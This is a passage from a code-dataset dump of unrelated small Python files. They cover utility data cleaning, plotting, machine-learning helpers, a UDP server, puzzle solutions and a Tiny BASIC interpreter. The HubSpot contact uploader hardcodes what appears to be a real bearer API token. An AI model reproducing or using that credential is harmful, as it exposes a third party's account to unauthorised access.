sixtyones_full.TOTALREVENUE.where(sixtyones_full.TOTALREVENUE=='.').isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALSALES.where(sixtyones_full.TOTALSALES=='.').isna()\n sixtyones_full = sixtyones_full[f]\n sixtyones_full = sixtyones_full.drop(columns=['OWNERSHIP'])\n sixtyones_full = sixtyones_full.infer_objects()\n f = sixtyones_full.UTILITYNUMBER.where(sixtyones_full.UTILITYNUMBER==0).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.UTILITYNUMBER.where(sixtyones_full.UTILITYNUMBER==88888).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALREVENUE.where(sixtyones_full.TOTALREVENUE==0).isna()\n sixtyones_full = sixtyones_full[f]\n f = sixtyones_full.TOTALSALES.where(sixtyones_full.TOTALSALES==0).isna()\n sixtyones_full =sixtyones_full[f]\n sixtyones_group = sixtyones_full.groupby(['DATAYEAR','MONTH','UTILITYNUMBER','UTILITYNAME']).agg({'TOTALREVENUE':'sum','TOTALSALES':'sum','TOTALCUSTOMERS':'sum','OWNERTYPE':'max'})\n sixtyones_group =sixtyones_group.reset_index()\n\n sixtyones_full.to_csv('../data/861m_state_clean.csv',index=False)\n sixtyones_group.to_csv('../data/861m_clean.csv',index=False)\n\n # COMBINING DATASETS\n sixtys_combine = sixtys_full.drop(columns=['LATITUDE','LONGITUDE','PLANTID','PLANTNAME']).copy()\n y = pd.get_dummies(sixtys_combine.GEN_TYPE, prefix='is')\n sixtys_combine = pd.concat([sixtys_combine, y],axis=1)\n sixtys_combine = sixtys_combine.drop(columns=['GEN_TYPE'])\n full_dirty = pd.merge(left=sixtys_combine,right=sixtyones_group,on=['DATAYEAR','MONTH','UTILITYNUMBER'])\n\n full_dirty['MW_COAL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_coal']\n full_dirty['MW_GEOTHERMAL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_geothermal']\n full_dirty['MW_HYDROELECTRIC'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_hydroelectric']\n full_dirty['MW_NATURAL_GAS'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_natural_gas']\n full_dirty['MW_NUCLEAR'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_nuclear']\n full_dirty['MW_OIL'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_oil']\n full_dirty['MW_OTHER'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_other/unreported']\n full_dirty['MW_SOLAR'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_solar']\n full_dirty['MW_WIND'] = full_dirty['NAMEPLATECAPACITY(MW)']*full_dirty['is_wind']\n\n combine = full_dirty.groupby(['DATAYEAR','MONTH','UTILITYNUMBER']).agg({'NETSUMMERCAPACITY(MW)':'sum','NETWINTERCAPACITY(MW)':'sum','NAMEPLATECAPACITY(MW)':'sum'\n ,'is_coal':'mean','is_geothermal':'mean','is_hydroelectric':'mean','is_natural_gas':'mean'\n ,'is_nuclear':'mean','is_oil':'mean','is_other/unreported':'mean','is_solar':'mean','is_wind':'mean'\n ,'MW_COAL':'sum','MW_GEOTHERMAL':'sum','MW_HYDROELECTRIC':'sum','MW_NATURAL_GAS':'sum'\n ,'MW_NUCLEAR':'sum','MW_OIL':'sum','MW_OTHER':'sum','MW_SOLAR':'sum','MW_WIND':'sum'\n ,'TOTALREVENUE':'mean','TOTALSALES':'mean','TOTALCUSTOMERS':'mean'})\n combine = combine.reset_index()\n\n combine.to_csv('../data/combined.csv',index=False)","repo_name":"lukeschroder/energy_revenues","sub_path":"src/cleaning.py","file_name":"cleaning.py","file_ext":"py","file_size_in_byte":18739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6295890040","text":"\nN = int(input())\n\n\narr = [list(map(int,input().split())) for _ in range(N)]\n# print(arr)\n# [[55, 185], [58, 183], [88, 186], [60, 175], [46, 155]]\nres = [1]*N\n\n# print(arr)\nfor i in range(N):\n tmp = arr[i]\n for j in range(N):\n if tmp[0] < arr[j][0] and tmp[1] None:\n \"\"\"\n The `display_wordcloud` function takes a string of text and plots\n the wordcloud.\n\n It also accepts an optional list of words to be removed from the wordcloud.\n\n Args:\n text (str): Pass a string of words to the function\n remove_words (str): Remove words from the wordcloud\n fig_width (int): Width of the wordcloud figure\n fig_height (int): Height of the wordcloud figure\n \"\"\"\n\n # Format data to be displayed\n text = re.sub(r\"[^a-zA-Z0-9 _]\", \"\", text).split(\" \")\n text = \" \".join(word for word in text if len(word) > 1)\n remove_words += STOPWORDS\n\n # Build wordcloud object\n x, y = numpy.ogrid[:fig_height, :fig_width]\n wc_mask = ((x/fig_height - 1/2) ** 2 + (y/fig_width - 1/2) ** 2) > 0.49 ** 2\n wc_mask = 255 * wc_mask.astype(int)\n wc_object = WordCloud(\n width=fig_width, height=fig_height,\n background_color=\"white\", colormap=colors.ListedColormap(COLORS),\n mask=wc_mask,\n max_words = 200, max_font_size = 100, stopwords=remove_words,\n ).generate(text)\n\n # Show figure\n pyplot.imshow(wc_object, interpolation=\"spline36\")\n pyplot.axis(\"off\")\n pyplot.show()\n\n print(wc_object.words_)\n","repo_name":"brobert-philips/pybrors","sub_path":"python/pybrors/utils/plotdata.py","file_name":"plotdata.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28389449278","text":"\"\"\"\r\nThis function store the collected contacts with their\r\nrespective transformed data in HubSpot.\r\n\"\"\"\r\n\r\nimport requests\r\n\r\ndef savingContacts(df, token, delete_none_emails=True):\r\n if delete_none_emails:\r\n df = df[df['raw_email'] != 'None']\r\n df['address'] = df['address'].fillna(\"None\")\r\n df['country'] = df['country'].fillna(\"None\")\r\n df['phone'] = df['phone'].fillna(\"None\")\r\n \r\n url = 'https://api.hubapi.com/crm/v3/objects/contacts'\r\n \r\n #Handle potential rate limited by batching requests\r\n batch_size = 10\r\n batches = [df[i:i+batch_size] for i in range(0, len(df), batch_size)]\r\n\r\n headers = {\r\n 'authorization': 'Bearer pat-na1-3c7b0af9-bb66-40e7-a256-ce4c5eb27e81',\r\n 'content-type': 'application/json'\r\n }\r\n \r\n #Upload contact counter\r\n success_count = 0 \r\n for batch in batches:\r\n contacts = []\r\n for _, row in batch.iterrows():\r\n #json payload for each contact\r\n contact = {\r\n \"properties\": {\r\n \"email\": row['raw_email'],\r\n \"phone\": row['phone'],\r\n \"country\": row['country'],\r\n \"city\": row['city'],\r\n \"original_create_date\": row['technical_test___create_date'],\r\n \"original_industry\": row['industry'],\r\n \"temporary_id\": row['hs_object_id'],\r\n \"address\": row['address']\r\n }\r\n }\r\n contacts.append(contact)\r\n\r\n #Request body with a list of contacts\r\n body = {\"inputs\": contacts}\r\n\r\n try:\r\n #POST request to upload the contacts to the HubSpot API\r\n response = requests.post(url, headers=headers, json=body)\r\n # Check for request errors\r\n response.raise_for_status() \r\n success_count += len(contacts) \r\n except requests.exceptions.RequestException as e:\r\n print(f\"Error: {e}\")\r\n \r\n message = f\"{success_count} contacts imported to Hubspot successfully\"\r\n\r\n return message","repo_name":"macasallasb/OnTheFuze-Test-II","sub_path":"Library/SavingContacts.py","file_name":"SavingContacts.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22836046428","text":"rivers = {\n 'nile': 'egypt',\n 'sena': 'france',\n 'tajo': 'spain',\n}\n\nfor river in rivers.keys():\n print(f\"The {river.title()} runs through {rivers[river].title()}.\")\n\nprint(\"Rivers mentioned:\")\nfor river in rivers.keys():\n print(f\"\\t{river.title()}\")\n\nprint(\"Countries mentioned:\")\nfor country in rivers.values():\n print(f\"\\t{country.title()}\")","repo_name":"ImAlexisSaez/book-pcc3","sub_path":"ch06/exer0605_rivers.py","file_name":"exer0605_rivers.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30718878858","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n CART,gini系数\n 参考:https://www.jianshu.com/p/01d820be67fb\n http://www.cnblogs.com/pinard/p/6053344.html(原理)\n CART回归树和CART分类树的建立和预测的区别主要有下面两点:\n 1)连续值的处理方法不同\n 2)决策树建立后做预测的方式不同。\n\"\"\"\n\nimport numpy as np\n\ndef Impurity(X,Label,ClassNum = 3):\n Len = np.size(X)\n sX = np.sort(X)\n Tha = np.zeros(Len-1)\n gi = np.zeros(Len-1)\n for i in range(Len-1):\n Th = (sX[i] + sX[i+1])/2\n Tha[i] = Th\n idx1 = np.where(X < Th)\n idx2 = np.where(X >= Th)\n p = np.zeros([2,ClassNum])\n g = np.zeros([1,2])\n ww = np.zeros([2,1])\n for Ti in range(2):\n if Ti == 1:\n idxTP = idx1\n else:\n idxTP = idx2\n Lab = Label[idxTP]\n for cs in np.arange(1,ClassNum+1):\n if np.size(idxTP) == 0:\n p[Ti,cs-1] = 0\n else:\n p[Ti,cs-1] = np.size(np.where(Lab == cs)) / np.size(idxTP)\n g[0,Ti] = gini(p[Ti,:])\n ww[Ti,0] = np.size(idxTP) / Len\n gi[i] = np.dot(g,ww)\n del idxTP,Lab\n idxa = np.argmin(gi)\n ThA = Tha[idxa]\n impur = gi[idxa]\n return impur,ThA\n\ndef gini(p):\n# 基尼系数计算公式\n if np.all(p == 0):\n g = 0\n else:\n g = 1 - np.sum(np.square(p))\n return g\n\nX = np.array([0,1,5,4,3,4,5,6,8,7,9,0])\nLabel = np.array([1,1,1,1,2,2,2,2,3,3,3,3])\nimpur,ThA = Impurity(X,Label)\nprint(\"impurity=\",impur,\"Best dividing point:\",ThA)\n","repo_name":"rulinqi/ml_action_book_py3","sub_path":"CART_09/classifyTrees.py","file_name":"classifyTrees.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39552354786","text":"# written by Rei Hosseini 07/08/2019\n# Updating the location of a bouncing ball using molecular dynamic concepts and comparing it with the results from LAMMPS\n\nimport numpy as np\nimport math \nimport matplotlib.pyplot as plt\nimport json\n\n\n# particle properties\nm=0.0654498 #based on the diameter and a density of 1000 kg/m^3\ndiam=0.05\nr=diam/2\n\n# contact properties and initial conditions\nKn=10000.\nCn=5.772 # calculated by assuming a COR of 0.7 (O'Sullivan 2011)\nxwall=0.\n\nH0=0.2\ng=9.81\n\ndt=0.000001\n\n# Initializing t,x and v arrays\nt=np.arange(0,1,dt)\nx=np.zeros(np.size(t))\nx[0]=H0\nv=np.zeros(np.size(t))\n\n# Updating Particle Location\nfor i in range(0,np.size(t)-1): \n dn=x[i]-xwall-r\n if dn>=0:\n a=-g\n else:\n a=max((-Kn*(x[i]-r)-Cn*v[i]),0)/m-g\n \n v[i+1]=v[i]+a*dt\n #x[i+1]=(v[i]+v[i+1])/2*dt+x[i]\n x[i+1]=x[i]+v[i]*dt+0.5*a*dt*dt\nnp.savetxt(\"bounce.csv\",x,delimiter=\",\")\n\n\n# Loading JSON results of LAMMPS\nwith open(\"lammps.json\",\"r\") as f:\n data=json.load(f)\n\n# Plotting\nplt.plot(t,x,label=\"My Code\")\nplt.plot(np.arange(len(data[\"height\"]))*data[\"dt\"],data[\"height\"],\"--r\",label=\"LAMMPS\")\nplt.legend()\nplt.show()\n\n","repo_name":"reihos/ls-dem","sub_path":"bouncing_ball/sphere/bounce.py","file_name":"bounce.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18597523723","text":"import numpy as np\nimport gnn\nimport functions as F\n\n\n\nclass Optimizer:\n model = None\n _loss = np.array([]) \n _TPTN = np.array([]) \n\n def __getattr__(self, key):\n if key == 'accuracy' and self._TPTN.size != 0:\n return np.average(self._TPTN)\n elif key == 'loss' and self._loss.size != 0:\n return np.average(self._loss)\n else:\n return None\n\n def setup(self, model):\n self.model = model\n self.reset()\n return self\n\n def update(self, T, batch, lossfun=None):\n raise NotImplementedError\n\n def report(self, loss, TPTN):\n self._loss = np.hstack((self._loss, np.array(loss)))\n self._TPTN = np.hstack((self._TPTN, np.array(TPTN)))\n\n def clear(self):\n self._loss = np.array([])\n self._TPTN = np.array([])\n\n def reset(self):\n pass\n\n\n\nclass GradientMethod(Optimizer):\n\n def __init__(self, alpha=0.01):\n self.alpha = alpha \n\n def update(self, T, batch, lossfun=None):\n inputs = batch[0]\n loss = lossfun(self.model, T, inputs)\n\n grad = loss.backward()\n params = self.model.params\n n_params = tuple([p - self.alpha*d \n for p, d in zip(params, grad)])\n self.model.param_update(n_params)\n\n self.report(loss.data, loss.TPTN)\n\n\nclass SGD(Optimizer):\n\n def __init__(self, alpha=0.01):\n self.alpha = alpha\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = [] \n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*g\n for p, g in zip(params, grad)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n\n\n\nclass MomentumSGD(Optimizer):\n\n def __init__(self, alpha=0.01, eta=0.9):\n self.alpha = alpha\n self.eta = eta\n self._w = tuple([0]*3)\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = []\n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*g + self.eta*w\n for p, g, w in zip(params, grad, self._w)])\n self._w = tuple([-self.alpha*g + self.eta*w\n for g, w in zip(grad, self._w)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n \n\n\nclass Adam(Optimizer):\n\n def __init__(self, alpha=0.01, beta1=0.9, beta2=0.999, eps=10**-9):\n self.alpha = alpha\n self.beta1 = beta1\n self.beta2 = beta2\n self.eps = eps\n self._m = tuple([0]*3)\n self._v = tuple([0]*3)\n self._t = 0\n\n def update(self, T, batch, lossfun=None):\n B = len(batch)\n grad = tuple([0]*3)\n loss_lst = []\n tptn = []\n\n for b in batch:\n loss = lossfun(self.model, T, b)\n grad = [d+l for d, l in zip(grad, loss.backward())]\n loss_lst.append(loss.data)\n tptn.append(loss.TPTN)\n grad = tuple([g/B for g in grad])\n \n self._t += 1\n self._m = tuple([self.beta1*m + (1-self.beta1)*g\n for m, g in zip(self._m, grad)])\n self._v = tuple([self.beta2*v + (1-self.beta2)*(g**2)\n for v, g in zip(self._v, grad)])\n m_hat = tuple([m/(1-self.beta1**self._t) for m in self._m])\n v_hat = tuple([v/(1-self.beta2**self._t) for v in self._v])\n\n params = self.model.params\n n_params = tuple([p - self.alpha*m/(np.sqrt(v)+self.eps)\n for p, m, v in zip(params, m_hat, v_hat)])\n self.model.param_update(n_params)\n \n self.report(loss_lst, tptn)\n\n","repo_name":"IsseiNAKASONE/PFNinternship2019CodingTask","sub_path":"optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36612935166","text":"# External Dependancies\nfrom curtsies import Input\nimport sys\nimport select\nfrom time import sleep\n\n# Custom Dependencies\nfrom Accelerometer import Accelerometer\nfrom Scanner import Scanner\nfrom FileManager import FileManager\n\nPRIMARY_CONNECTION_STRING = \"\"\n\ndef event_loop(accelerometer, file_manager, scanner):\n\n while(True):\n acceleration = accelerometer.compute_acceleration()\n angular_velocity = accelerometer.compute_angular_velocity()\n print(\"Gx=%.2f\" %angular_velocity[0], u'\\u00b0'+ \"/s\", \"\\tGy=%.2f\" %angular_velocity[1], u'\\u00b0'+ \"/s\", \"\\tGz=%.2f\" %angular_velocity[2], u'\\u00b0'+ \"/s\", \"\\tAx=%.2f g\" %acceleration[0], \"\\tAy=%.2f g\" %acceleration[1], \"\\tAz=%.2f g\" %acceleration[2]) \n path = \"\"\n\n input = select.select([sys.stdin], [], [], 1)[0]\n if input:\n value = sys.stdin.readline().rstrip()\n print(value)\n\n if (value == \"s\"):\n print(\"scanning\")\n if scanner.is_in_session == False:\n print(\"New session\")\n path = file_manager.create_folder()\n scanner.start_session(path)\n scanner.scan()\n \n elif (value == \"q\"):\n print(\"Ending session\")\n scan = scanner.stop_session()\n file_manager.insert_session(scan)\n # file_manager.upload_to_azure_storage(PRIMARY_CONNECTION_STRING, path)\n\n elif (value == \"d\"):\n file_manager.show_database()\n\n\ndef main():\n accelerometer = Accelerometer()\n accelerometer.MPU_Init()\n # sleep(1)\n\n default_root_dir = \"/home/crsz/Pictures/Scans/\"\n file_manager = FileManager(default_root_dir)\n scanner = Scanner()\n\n event_loop(accelerometer, file_manager, scanner)\n\n file_manager.show_database()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"crsz20/Handheld-3D-Scanner","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36377780878","text":"\nN, M = map(int, input().split())\n\ndp = [1]*101\n\nmax_n = max(N, M)\nfor i in range(1, max_n+1):\n dp[i] = i * dp[i-1]\n\nprint(dp[N]//(dp[N-M]*dp[M]))\n","repo_name":"studying-ice-bear/pparkkkimeom","sub_path":"GimYujin/Dynamic_Programming_1/bj2407.py","file_name":"bj2407.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41603358735","text":"#!/usr/bin/python2.7\r\n\r\n# imports\r\nimport socket\r\n\r\n# Defino servidor\r\nlocalAddrPort = (\"127.0.0.1\",20001) # Dir y puerto local\r\nbufferSize = 1024 #tamano del datagrama\r\n# msgServer = \"Hola Mundo al Cliente\" # mensaje a enviar al cliente\r\n# encodedMsg = str.encode(msgServer) # mensaje codificado\r\n\r\nUDPServerSocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) # Creo server socket\r\nUDPServerSocket.bind(localAddrPort) # Hago binding con direccion e IP\r\nprint(\"Servidor UDP escuchando...\")\r\n\r\nwhile(True): # ciclo para escuchar datagramas\r\n rcvdMsg, clientAddr = UDPServerSocket.recvfrom(bufferSize) # Recibo mensaje con direccion IP del cliente\r\n rcvdMsg.decode()\r\n clientIP = clientAddr[0] # Guardo direccion IP del cliente\r\n print(\"Mensaje del cliente: \" + rcvdMsg)\r\n print(\"Direccion del cliente: \" + clientIP)\r\n # Respondo al cliente\r\n encodedMsg = str.encode(str.upper(rcvdMsg)) # Convierto a mayusculas y codifico\r\n UDPServerSocket.sendto(encodedMsg, clientAddr) # Envio respuesta al cliente","repo_name":"gabgut/investigacion_2","sub_path":"UDP/udpserver.py","file_name":"udpserver.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29713531711","text":"import math\n\ndef exp(x,y):\n if y is 0: return 1\n if y is 1: return x\n i=2\n temp=x\n x=x*x\n \n while i*i < y:\n x=x*x\n i=i*i\n while i < y:\n x=x*temp\n i=i+1\n return x\n\nprint(exp(9,7))","repo_name":"gabemgem/Algo-S2018","sub_path":"Tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20225288446","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12938\n\ndef solution(n, s):\n \"\"\"\n 자연수 n개로 합이 s인 수 만들기\n 각 숫자의 크기가 비슷해야 곱이 최대가 됨\n \"\"\"\n if n > s:\n return [-1]\n\n n1, n2 = divmod(s, n)\n result = [n1] * n\n for i in range(n2):\n result[i] += 1\n\n return sorted(result)\n\nif __name__ == \"__main__\":\n # n = 2\n # s = 9\n n = 2\n s = 8\n result = solution(n, s)\n print(result)","repo_name":"ko509/Weekly-AlgoStudy","sub_path":"1차/1주차/한나연/최고의 집합.py","file_name":"최고의 집합.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"7792062654","text":"import os\nimport sys\nimport math\nimport platform\nimport traceback\nfrom getch import getch\n\nVERSION = 2\n\nmath_functions = {\n \"COS\": math.cos,\n \"SIN\": math.sin,\n \"TAN\": math.tan,\n \"ACOS\": math.acos,\n \"ASIN\": math.asin,\n \"ATAN\": math.atan,\n \"COSH\": math.cosh,\n \"SINH\": math.sinh,\n \"TANH\": math.tanh,\n \"ACOSH\": math.acosh,\n \"ASINH\": math.asinh,\n \"ATANH\": math.atanh,\n \"DEG\": math.degrees,\n \"RAD\": math.radians,\n \"ABS\": math.fabs,\n \"SQRT\": math.sqrt,\n \"LOG\": math.log,\n \"LOG2\": math.log2,\n \"LOG10\": math.log10,\n \"EXP\": math.exp,\n \"ROUND\": lambda x: float(round(x)),\n \"CEIL\": lambda x: float(math.ceil(x)),\n \"FLOOR\": lambda x: float(math.floor(x))\n}\n\nreserved = [\n \"LET\", \"PRINT\", \"INPUT\", \"IF\", \"GOTO\",\n \"SLEEP\", \"END\", \"LIST\", \"REM\", \"READ\",\n \"WRITE\", \"APPEND\", \"RUN\", \"CLS\", \"CLEAR\",\n \"EXIT\", \"LOAD\", \"SAVE\", \"THEN\", \"ELSE\",\n \"FOR\", \"TO\", \"DO\", \"GOSUB\", \"RETURN\",\n \"STA\", \"STS\", \"STT\", \"LDA\", \"LDS\", \"LDT\", \"DIR\"\n]\n\nregisters = {\n \"A\": 0,\n \"S\": 0,\n \"T\": 0,\n}\n\noperators = [\n [\"==\", \"!=\", \">\", \"<\", \">=\", \"<=\"],\n [\"<<\", \">>\"],\n [\".\"],\n [\"+\", \"-\"],\n [\"*\", \"/\", \"&\", \"|\", \"%\"],\n [\"^\"],\n [\"!\"] + list(math_functions.keys())\n]\n\nconstants = {\n \"PI\": math.pi,\n \"E\": math.e,\n \"TAU\": math.tau,\n}\n\nlines = {}\nmaxLine = 0\nlinePointer = 0\nstopExecution = False\n# change identifiers to be a list of set, in order to call subroutine\nidentifiers = [{}]\nreturnPos = []\nprintReady = True\n\ncommands = [\"\"]\ncurrentCommand = 0\n\ndef clearCommand():\n # clear current line in stdout\n if platform.system() == \"Windows\":\n print(\"\\r\" + ' ' * 64 + \"\\r\", end = \"\", flush = True)\n else:\n print(\"\\x1b[1K\\r\", end = \"\", flush = True)\n print(\"\\>\", end = \" \", flush = True)\n\nkey = {\n \"special\": b'\\xe0' if platform.system() == \"Windows\" else '\\x1b',\n \"enter\": b'\\x0d' if platform.system() == \"Windows\" else '\\x0d',\n \"backspace\": b'\\x08' if platform.system() == \"Windows\" else '\\x7f',\n \"ctrl+d\": b'\\x04' if platform.system() == \"Windows\" else '\\x04',\n \"up\": b'\\xe0H' if platform.system() == \"Windows\" else '\\x1b[A',\n \"down\": b'\\xe0P' if platform.system() == \"Windows\" else '\\x1b[B'\n}\n\n# function to get input command\n# can repeat commands had been executed by up and down arrow\ndef getInput():\n global commands, currentCommand\n ss = \"\"\n while True:\n c = getch()\n if c == key[\"special\"]:\n if platform.system() == \"Windows\": c += getch()\n else: c += getch() + getch()\n if c == key['up']:\n if currentCommand <= 0: continue\n currentCommand -= 1\n if c == key['down']:\n if currentCommand >= len(commands) - 1: continue\n currentCommand += 1\n clearCommand()\n print(commands[currentCommand], end = \"\", flush = True)\n ss = commands[currentCommand]\n elif c == key['enter']:\n print()\n if ss: # if there is a command in ss, return it\n commands.insert(-1, ss.strip())\n currentCommand = len(commands) - 1\n return ss\n else: # if there is no command in ss, return empty string\n return \"\"\n elif c == key['ctrl+d']:\n return \"EXIT\"\n # if c is a back space, delete the last character\n elif c == key['backspace']:\n if ss:\n ss = ss[:-1]\n clearCommand()\n print(ss, end = \"\", flush = True)\n else: # if c is a normal character, add it to ss\n if platform.system() == \"Windows\": c = c.decode('utf-8')\n print(c, end = \"\", flush = True)\n ss = ss + c\n\ndef main():\n global stopExecution\n print(f\"Tiny BASIC version {VERSION}\\nby Jeffrey Chen\")\n print(\"\\n\\n\")\n while True:\n try:\n if printReady:\n # not a bug fixed, just prefer this way\n print(\"\\>\", end = \" \", flush = True)\n nextLine = getInput()\n if len(nextLine) > 0:\n executeTokens(lex(nextLine))\n # bug fixed: reset stopExecution when a command is done\n stopExecution = False\n except KeyboardInterrupt:\n pass\n except EOFError:\n print(\"Bye!\")\n break\n except SystemExit:\n print(\"Bye!\")\n break\n except Exception as e: # show traceback when error occurs\n error_class = e.__class__.__name__ #取得錯誤類型\n detail = e.args[0] #取得詳細內容\n cl, exc, tb = sys.exc_info() #取得Call Stack\n lastCallStack = traceback.extract_tb(tb)[-1] #取得Call Stack的最後一筆資料\n fileName = lastCallStack[0] #取得發生的檔案名稱\n lineNum = lastCallStack[1] #取得發生的行號\n funcName = lastCallStack[2] #取得發生的函數名稱\n errMsg = \"File \\\"{}\\\", line {}, in {}: [{}] {}\".format(fileName, lineNum, funcName, error_class, detail)\n print(\"\\nExecution halted:\\n\"+errMsg)\n\ndef clearLines(): # clear all codes\n global lines, maxLine\n lines = {}\n maxLine = 0\n\ndef resetExcution(): # reset all variables and registers\n global identifiers, returnPos, registers\n identifiers = [{}]\n returnPos = []\n registers = {\n \"A\": 0,\n \"S\": 0,\n \"T\": 0,\n }\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef getVarType(token):\n if len(token) > 1:\n if token[-1] == \"$\":\n return \"STRING\"\n return \"NUM\"\n\ndef isValidIdentifier(token):\n if len(token) == 0:\n return False\n if len(token) > 1:\n if token[-1] == \"$\":\n token = token[0:-1]\n if not (token[0].lower() in \"abcdefghijklmnopqrstuvwxyz_\"):\n return False\n for c in token[1:]:\n # bug fixed: token[0].lower() -> c.lower()\n if not (c.lower() in \"abcdefghijklmnopqrstuvwxyz0123456789_\"):\n return False\n return True\n \ndef lex(line):\n # Splitteo la linea en varios tokens # split line into tokens\n inString = False\n tokens = []\n currentToken = \"\"\n line = line + \" \"\n for c in line:\n if not(inString) and c in \" \\\"\":\n if len(currentToken) != 0:\n tokens.append([currentToken, \"TBD\"]) # To Be Decide?\n currentToken = \"\"\n if c == '\"':\n inString = True\n elif inString and c == '\"':\n tokens.append([currentToken, \"STRING\"])\n currentToken = \"\"\n inString = False\n # to make expressions like \"(1 + 2) * 3\" work\n # parentesis don't have to separate with other tokens by spaces\n elif not(inString) and c in ['(', ')']:\n if len(currentToken) != 0:\n tokens.append([currentToken, \"TBD\"])\n currentToken = \"\"\n tokens.append([c, \"PAREN\"]) # parentesis\n else:\n currentToken += c\n\n # Le asigno un tipo a cada token (assign a type to each token)\n for token in tokens:\n if token[1] != \"TBD\":\n continue\n value = token[0]\n if is_number(value):\n token[0] = float(token[0])\n token[1] = \"NUM\" #Number\n elif value.upper() in reserved:\n token[0] = value.upper()\n token[1] = \"RESVD\" #Reserved word\n elif value in constants:\n token[0] = constants[value.upper()]\n token[1] = \"NUM\" #built-in constant\n elif value == \"=\":\n token[1] = \"ASGN\"\n elif isValidIdentifier(token[0]) and token[0] not in math_functions:\n token[1] = \"ID\" #Identifier\n else:\n for operator in operators:\n if token[0] in operator:\n token[1] = \"OP\"\n #print(tokens)\n return tokens\n\ndef executeTokens(tokens):\n global lines, maxLine, stopExecution, linePointer, printReady, identifiers, returnPos\n printReady = True\n if tokens[0][1] == \"NUM\":\n lineNumber = int(tokens.pop(0)[0])\n if len(tokens) != 0:\n lines[lineNumber] = tokens\n if lineNumber > maxLine:\n maxLine = lineNumber\n else:\n lines.pop(lineNumber, None)\n return\n if tokens[0][1] != \"RESVD\":\n # bug fixed: stopExecution when run into a non-reserved word\n stopExecution = True\n print(f\"Error: Unknown command {tokens[0]}.\")\n else:\n command = tokens[0][0]\n if command == \"REM\":\n return\n elif command == \"CLS\":\n print(\"\\n\"*500)\n elif command == \"END\":\n stopExecution = True\n elif command == \"EXIT\":\n quit()\n elif command == \"CLEAR\":\n clearLines()\n resetExcution()\n elif command == \"DIR\": # list all the variables and their values in the current scope\n print(identifiers[0])\n elif command == \"LIST\":\n i = 0\n while i <= maxLine:\n if i in lines:\n line = str(i)\n for token in lines[i]:\n tokenVal = \"\"\n if token[1] == \"NUM\":\n tokenVal = getNumberPrintFormat(token[0])\n elif token[1] == \"STRING\":\n tokenVal = f\"\\\"{token[0]}\\\"\"\n else:\n tokenVal = token[0]\n line += \" \" + str(tokenVal)\n print(line)\n i = i + 1\n elif command == \"PRINT\":\n if not(printHandler(tokens[1:])): stopExecution = True\n elif command == \"LET\":\n if not(letHandler(tokens[1:])): stopExecution = True\n elif command == \"INPUT\":\n if not(inputHandler(tokens[1:])): stopExecution = True\n elif command == \"GOTO\":\n if not(gotoHandler(tokens[1:])): stopExecution = True\n elif command == \"IF\":\n if not(ifHandler(tokens[1:])): stopExecution = True\n elif command == \"FOR\":\n if not(forHandler(tokens[1:])): stopExecution = True\n elif command == \"RUN\":\n linePointer = 0\n # bug fixed: clear identifiers before execution\n resetExcution()\n while linePointer <= 